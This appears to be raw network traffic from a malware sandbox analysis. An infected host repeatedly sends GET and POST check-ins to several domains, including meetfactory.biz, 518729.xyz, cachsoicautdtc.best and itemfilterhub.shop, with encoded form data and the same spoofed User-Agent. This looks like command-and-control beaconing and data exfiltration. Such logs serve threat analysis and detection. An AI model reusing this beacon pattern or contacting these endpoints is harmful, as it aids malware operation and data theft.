                                                Connection: Upgrade, close
                                                Vary: Accept-Encoding
                                                Content-Encoding: br
                                                Content-Length: 12523
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                57          192.168.11.20  49899        103.247.8.53    80
                                                Timestamp                             Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:21.877654076 CEST  553                OUT        GET /21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb HTTP/1.1
                                                Host: www.asa-malukuutara.com
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:22.332128048 CEST  518                IN         HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:03:22 GMT
                                                Server: Apache
                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Location: http://asa-malukuutara.com/21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb
                                                Vary: Accept-Encoding
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                58          192.168.11.20  49900        96.126.123.244  80
                                                Timestamp                             Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:35.633765936 CEST  823                OUT        POST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:35.768976927 CEST  804                IN         HTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 06:03:35 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                content-encoding: gzip
                                                connection: close


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                59          192.168.11.20  49901        96.126.123.244  80
                                                Timestamp                             Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:38.305671930 CEST  1163               OUT        POST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:38.441900969 CEST  804                IN         HTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 06:03:38 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                content-encoding: gzip
                                                connection: close


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                60          192.168.11.20  49902        96.126.123.244  80
                                                Timestamp                             Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:40.983166933 CEST  2578               OUT        POST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:41.117100000 CEST  778                IN         HTTP/1.1 413 Request Entity Too Large
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 06:03:41 GMT
                                                content-type: text/html
                                                content-length: 607
                                                connection: close
                                                Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body bgcolor="white"><center><h1>413 Request Entity Too Large</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                61          192.168.11.20  49903        96.126.123.244  80
                                                Timestamp                             Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:43.647979975 CEST  549                OUT        GET /o0e7/?ij60MtY=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&wXB=brv4Erb HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:03:43.782824039 CEST  1289               IN         HTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 06:03:43 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                connection: close
                                                Data Ascii: 498<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.meetfactory.biz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.meetfactory.biz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1724738623.0026592825&other_args=eyJ1cmkiOiAiL28wZTciLCAiYXJncyI6ICJpajYwTXRZPXhIdWhpaEE1YTBSQ1FEcjdVcXBhd1QxY1lMOUJPcWdiZGdaMy8zOHdEN2xyU3JVNmxsSFV0MTlTZzY1VzRBSWtpSFJ6NjQwT3RGSGxPcmVwYm1xQ1JNTjBSbjNhOEh2SE5tNlIxV09PeU1VYXhjNVNkcUVCazRvPSZ3WEI9YnJ2NEVyYiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhd [TRUNCATED]
                                                Aug 27, 2024 08:03:43.782836914 CEST  55                 IN         Data Raw: 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: } </script> </body></html>0


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                62          192.168.11.20  49904        23.231.158.3    80
                                                Timestamp                             Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:49.107882023 CEST  808                OUT        POST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                63          192.168.11.20  49905        23.231.158.3    80
                                                Timestamp                             Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:03:51.942110062 CEST  1148               OUT        POST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                64 | 192.168.11.20 | 49906 | 23.231.158.3 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:03:54.797867060 CEST | 2578 | OUT | POST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                65 | 192.168.11.20 | 49907 | 23.231.158.3 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:03:57.626565933 CEST | 544 | OUT | GET /s1mg/?ij60MtY=2QViuhW/NYaw5nxi+F1oVZq46szrrR71oUxOni/Qn+PFEj/1SakqFOMu9uwTuSiQaklPQGQrKMR1DX8jJ/FrQ8LNcsmQ9XMkBTdB/FoVvRnsRxC4QNxtOLg=&wXB=brv4Erb HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                66 | 192.168.11.20 | 49908 | 172.67.191.241 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:03.143290997 CEST | 835 | OUT | POST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:03.266074896 CEST | 865 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:04:03 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 07:04:03 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z69u57Tl%2Fw%2BuQAmY4Ey3FIfcoLICdlCg2kMKa8TiHoYMyB5lc7%2BmCAghYICgVTsQxVafTDW8WQI8jYAGcXjHWPmxdhzUv7jhsN771yojX5fFiaeeNI3tHTi4dhrLEkhwEnTI7y28a%2FCflw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99dca7facbc936-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                67 | 192.168.11.20 | 49909 | 172.67.191.241 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:05.782881975 CEST | 1175 | OUT | POST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:05.899171114 CEST | 865 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:04:05 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 07:04:05 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ke%2FHgq5zfq2l7hV5aB3jgi3Y7NMUaenBUu3u0kiCpWMX0HLTwf3GiJdz6EZ1BQrC%2F4MPwCgHNgcoTxRWuwa9%2FLNIi0hdyyXwZui32xhRD1W86xwQtwaCtK%2FSt2o205ngJPKVCVcDzfirUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99dcb87e1ac930-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                68 | 192.168.11.20 | 49910 | 172.67.191.241 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:08.425949097 CEST | 2578 | OUT | POST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:08.544146061 CEST | 869 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:04:08 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 07:04:08 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rYa4dAEq3NpB4%2BPWp2NWEKafRfqmEu%2B0nQn%2BxcfeurmZIGcK7HH9hvlyazVA%2BP6moIVTy5efVQVKHUN13s9LyfwF8%2FB34kiC6%2BdVDhCVy5jjHJxy3FbsxDMUgLjEiQlOytnQvKI6mdbaqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99dcc8fec05aed-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                69 | 192.168.11.20 | 49911 | 172.67.191.241 | 80
                                                Timestamp | Bytes transferred | Direction | Data
                                                Aug 27, 2024 08:04:11.060709953 CEST | 553 | OUT | GET /fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:11.175339937 CEST | 989 | IN | HTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 06:04:11 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 07:04:11 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/?ij60MtY=hTm9ypMPCvkZHpXOUIowtI5N2+z4niygtjCFVe/8mioZPRfz5TFJ3IewZaR+NPU03UUaFdubUQ2FIRqoOOixztWDEcr2XGgHHm20+kxsPtJkRiaVsamec0k=&wXB=brv4Erb
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kTzVhj1f0Z7BgVkxLl%2FJhVP1YIDGGfPUoJzxdAzJ%2Fj2cp%2BUS39b3HfeI%2FiDGJRBzcdvfW%2BGhISWhatQzP9nlNz9RUMaie0qR40M2jYSvdmtG5jW%2BJO6MYy8xDRLHgWwNkn8%2BGDJUdOFE1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dcd979680668-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                70          192.168.11.20  49912        172.67.166.145  80
                                                Timestamp  Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:04:16.299103022 CEST  832  OUT  POST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 61 55 66 50 66 54 68 39 4b 36 6c 49 34 79 58 63 43 43 36 43 46 6a 6c 33 79 42 2b 62 4c 31 71 66 4d 6c 59 6e 4a 72 37 6b 6c 31 4d 47 76 5a 6f 2f 4b 7a 33 62 4e 73 6d 6b 36 6c 43 33 70 2f 4c 74 41 54 69 46 73 38 4d 6b 73 4b 7a 58 72 77 67 56 58 61 48 50 34 32 45 58 4e 5a 6d 48 34 4e 2f 7a 31 53 55 70 52 41 75 4e 65 69 6a 75 67 6c 37 42 58 6b 79 64 59 57 73 4a 72 46 46 7a 64 64 54 30 42 59 7a 66 4b 2f 47 63 53 70 36 4e 72 64 66 5a 73 4f 31 2b 4a 67 65 6a 2f 6f 72 4f 62 32 57 44 32 2f 55 31 7a 30 56 6a 64 53 51 4e 63 32 45 78 75 38 39 46 75 2f 62 59 48 65 53 58 36 78 4b 64 77 41 3d 3d
                                                Data Ascii: ij60MtY=aUfPfTh9K6lI4yXcCC6CFjl3yB+bL1qfMlYnJr7kl1MGvZo/Kz3bNsmk6lC3p/LtATiFs8MksKzXrwgVXaHP42EXNZmH4N/z1SUpRAuNeijugl7BXkydYWsJrFFzddT0BYzfK/GcSp6NrdfZsO1+Jgej/orOb2WD2/U1z0VjdSQNc2Exu89Fu/bYHeSX6xKdwA==
                                                Aug 27, 2024 08:04:16.565432072 CEST  748  IN  HTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 06:04:16 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dWu%2BcTHG6yFtHhae%2F9RP2E9eT4UQgBQWV7mP4buF6ufYjgMPywymG%2Bk%2FLhQx36WZM7kyidV5m3Iy0mLIGkM2tdfwPG0nzHrM8eL3Otyo%2FXphOQ379yTVPi5xsHVOF9NCqTe2wJhTFTtt"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dcfa3b3420a2-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                71          192.168.11.20  49913        172.67.166.145  80
                                                Timestamp  Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:04:18.936269045 CEST  1172  OUT  POST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:19.188381910 CEST  738  IN  HTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 06:04:19 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bRUdkVo5FXCeMAt5luK7JkC%2FqJp73IDV59U6Vp8NEtoy%2BSmUaAf5Yw1nr2dbEnVJoui6cvb%2FFEIAEgZgUsdrphedYCpr94APtPLnKIMf8kry%2FjSWu6S744XLeHMORSq1GgqkI%2BbLeinw"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dd0aac063958-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                72          192.168.11.20  49914        172.67.166.145  80
                                                Timestamp  Bytes transferred  Direction  Data
                                                Aug 27, 2024 08:04:21.578556061 CEST  1289  OUT  POST /p1v4/ HTTP/1.1
                                                Host: www.itemfilterhub.shop
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.itemfilterhub.shop
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.itemfilterhub.shop/p1v4/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:22.023859978 CEST  742  IN  HTTP/1.1 404
                                                Date: Tue, 27 Aug 2024 06:04:21 GMT
                                                Content-Type: text/html;charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2JH1AiwRRzthgqwPCw1A04AidlXb0ia1tOL8ifolnDxZxIaVsXADa5nSZcvrmws5guY6y8cyV0CDB8hkOQWQ%2BG8UsdeU58%2F8oPkTWDFvXQpkHguadZaiKDYLyW7SaMAJN7WVz8jW68e"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8b99dd1b3a64c99d-IAD
                                                Content-Encoding: gzip
                                                alt-svc: h3=":443"; ma=86400


                                                Session ID  Source IP      Source Port  Destination IP  Destination Port
                                                73          192.168.11.20  49915        172.67.166.145  80
                                                Timestamp  Bytes transferred  Direction  Data
